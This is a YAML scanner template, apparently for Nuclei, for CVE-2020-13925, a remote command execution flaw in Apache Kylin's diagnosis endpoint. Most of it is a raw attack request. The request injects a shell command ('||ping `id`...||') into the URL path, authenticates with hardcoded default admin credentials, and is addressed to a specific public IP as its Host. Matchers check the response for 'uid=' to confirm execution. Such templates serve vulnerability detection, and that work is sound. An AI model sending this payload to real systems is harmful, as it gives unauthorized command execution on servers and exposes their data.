id: CVE-2020-13925

info:
  name: Apache Kylin DiagnosisController - Remote Code Execution
  author: SleepingBag945
  severity: critical
  description: 黑客可以利用这个漏洞，登录任何管理员账号和密码默认未修改的账号，获得管理员权限。由于Apache Kylin被广泛应用于企业的大数据分析平台，因此该漏洞将对企业核心数据具有较大的危害，存在数据泄露风险，建议用户尽快升级软件至安全版本。
  reference:
    - http://wiki.peiqi.tech/wiki/webserver/Apache/Apache%20Kylin%20DiagnosisController.java%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2020-13925.html
  tags: kylin,rce

http:
  - raw:
      - |
        GET /kylin/api/diag/project/%7C%7Cping%20%60id%60.111.111.111%7C%7C/download HTTP/1.1
        Host: 116.62.108.94:7070
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Authorization: Basic YWRtaW46S1lMSU4=




    matchers-condition: and
    matchers:
      - type: word
        words:
          - "uid="
        part: body

      - type: word
        words:
          - "OS command error exit"
        part: body

      - type: word
        words:
          - "\"code\":\"999\""
        part: body

      - type: status
        status:
          - 500

# Enhanced by mp on 2022/05/13
